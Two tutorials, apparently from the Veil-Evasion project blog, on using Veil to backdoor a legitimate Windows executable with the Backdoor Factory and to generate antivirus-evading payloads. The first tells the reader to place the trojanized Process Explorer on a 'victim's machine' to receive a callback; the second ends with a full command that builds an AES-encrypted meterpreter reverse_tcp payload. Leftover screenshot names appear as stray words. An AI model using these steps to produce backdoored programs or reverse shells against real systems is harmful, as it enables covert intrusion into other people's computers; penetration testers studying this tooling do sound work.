How to Customize Backdoor Factory Payloads within Veil

We were lucky enough to be able to include The Backdoor Factory by Joshua Pitts in our October 2013 V-day.  It’s a great tool and we’re really happy to have been able to work with Josh to include the Backdoor Factory within Veil as an option.  As it is currently implemented, the Backdoor Factory payload will backdoor the psinfo.exe executable that comes with Veil.  So this leads to the question, how do you change the executable that is backdoored?  That’s what this tutorial is set out to show you.

First, the you’ll need to select the executable you want to backdoor.  In this instance, we chose the Microsoft tool Process Explorer.  One thing to note when choosing the executable to backdoor, ensure that it’s not UPX packed.  Also, in our current implementation of the Backdoor Factory payloads, we’re primarily focused on x32 binaries.  Full support for x64 binaries within Veil will come in a future update.

Now that we have our executable, you want to copy it into the “tools/backdoor” directory within the Veil folder structure as shown below.  Or, your other option will be to provide the full path to your executable for the orig_exe option (as shown in this video).

bdffolder

Now that our binary is in the correct location, we can start Veil.  When listing the available payloads, use the “native/BackdoorFactory” payload.  Now, we need to set our required option.  Go ahead and define the LHOST and LPORT options to correspond with your handler.  Now, we need change the “orig_exe” option.  In this case, change the exe and have set to the new executable, in this case, “procexp.exe” (if you didn’t place your executable in the tools/backdoor directory, provide the full path to the executable you want to backdoor).

setorig_exe

We can always verify that our options are correctly set by typing the “info” command.

generatebdf

Now that we’ve confirmed we’re all set, go ahead and give Veil the “generate” command.  Veil will invoke the Backdoor Factory payload and use the process explorer executable.  Once the backdoored executable has been generated, you should see Veil’s familiar output screen.

procbackdoored

Now, simply move the backdoored executable onto your victim’s machine and run it.  You will still see the executable run normally, except we now also receive a callback!

backdooredproccallback

And that is how you change the program that is backdoored within Veil.  If you have any questions, just let us know!

 

 

Veil Tutorial – Usage

With the completely revamped menu structure released in Veil 2.0, we felt it was appropriate to write a short tutorial detailing how to use Veil. At any point, if anyone has any usage questions, please feel free to talk to any of us via Twitter at:

If you encounter any bugs, have any patches, or wish to add new features, send us a request via Github. Github lets us easily track the status of any issues and makes sure we can provide credit where necessary. You can also ask any questions on our forums or hit us up on #veil on freenode.

To launch Veil, execute $./Veil.py . Upon an initial run, Veil will execute ./config/update.py, which attempts to detect installation directories, operating system details, and other relevant specifications, which it writes out to /etc/veil/settings.py. This settings configuration file is also manually editable.

After configuration, you will be presented with the main menu. This details the number of payload modules loaded as well as useful commands:

veil_main_menu

Type “list” to list all payloads:

veil_list_payloads

To list information on a specific payload, type “info [payload number/payload name]“, or “info [tab]” to tab complete the the payloads available. To use a payload, type “use [payload number/payload name]“, or “use [tab]” to tab complete the the payloads available. You can also just type the number of the payload from list in order to use the associated payload. On loading a specific module, the payload menu is presented:

veil_payload_menu

This presents details and required options for the payloads, as well as relevant commands. Typing “info” will give more detailed information about the payload:

veil_payload_info

Under “required options”, the name of the option as well as its default value and description are displayed. If a value isn’t filled in for the default, you will be required to input a value before the payload can be generated. To set an option value, type “set [option name]” then type the desired value.

After filling in the required options, to actually generate the payload, type “generate“. If the payload uses shellcode, you will be taken to the shellcode menu, where you can select 1) msfvenom or 2) custom shellcode. If custom shellcode is selected, input your shellcode in the form \x01\x02… without quotes and newlines (\n). If msfvenom is chosen, you will be presented with the default choice of windows/meterpreter/reverse_tcp. If you want another payload, enter the windows payload in msfvenom syntax, or press [tab] to tab complete the available payloads. The MSF tree is automatically crawled, and payloads/options extracted. After choosing a payload, required options are presented (LHOST is tab completable for the local IP and LPORT is tab completable for 4444, the default MSF port). After filling in required options, the opportunity to enter extra msfvenom options in “OPTION=value” syntax is presented.

veil_generation_menu

After pressing enter, shellcode is generated and the payload is built. You are then presented with the output menu, where you can choose the base name for your generated payload files. If your payload was python based and you set “compile_to_exe” in the options, you will be presented with the option of pyinstaller (compile to exe natively on Kali linux) or the generation of py2exe files.

veil_output_menu

The final screen displays information on the generated payload, including any compiled/source file locations. Pressing any key will return you to the main menu.

veil_output_menu

Veil also now incorporates command line switches for almost all options. ./Veil.py -h details all the available options. A quick example:

$./Veil.py -p python/shellcode_inject/aes_encrypt -o output --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.1.1 LPORT=443